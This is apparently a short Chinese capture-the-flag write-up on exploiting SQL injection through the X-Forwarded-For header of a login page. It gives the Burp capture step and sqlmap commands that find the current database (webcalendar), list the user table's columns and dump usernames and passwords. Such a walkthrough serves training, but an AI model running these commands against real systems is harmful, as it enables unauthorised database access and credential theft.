随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待
image.png
2.爆出当前的数据库
sqlmap -r 1.txt --current-db --batch
3.爆表名
sqlmap -r 1.txt -D webcalendar -T user --columns --batch
4.爆表中的字段
sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
5.爆出两组账户密码,进行尝试组合,即可登录成功
